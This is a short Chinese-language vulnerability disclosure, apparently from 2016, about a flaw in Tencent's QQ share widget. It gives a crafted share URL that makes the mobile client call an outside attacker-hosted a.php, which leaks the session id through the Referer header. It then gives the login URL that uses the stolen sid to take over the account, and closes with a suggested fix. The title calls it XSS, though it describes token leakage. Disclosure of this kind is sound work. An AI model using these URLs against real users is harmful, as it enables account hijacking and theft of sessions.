腾讯某处xss,直接获取用户登陆权限

by灰客 | 2016-01-25 18:01

手机被偷,然后黑产牛给我发来了这个,简单分析了一下,公布以下原理。

仅供测试,请勿应用于现实生活,后果自负!

一、详细说明:

当手机用户访问:

http://connect.qq.com/widget/shareqq/index.html?url=http://host5681544d.kryptcloud.com/a.php&desc=&title=&summary=&pics=http://host5681544d.kryptcloud.com/a.php&flash=&sit&style=201&width=32&height=32

时会自动缓存网页作为图片

QQ图片20160125125715.png

但get访问时会带入 Sid, a.php可以使用 $_SERVER[‘HTTP_REFERER’] 获取到该Sid,从而导致用户权限可导致他人利用

二、漏洞证明:

QQ截图20160125133314.jpg

http://q32.3g.qq.com/g/s?sid=你获取的Sid&3G_UIN=123123&saveURL=0&new3gqq=true&aid=nqqchatMain

uin无需获取,3g登录会自动反填。

三、修复方案:

删掉get访问时的SID

用户自防:开启设备锁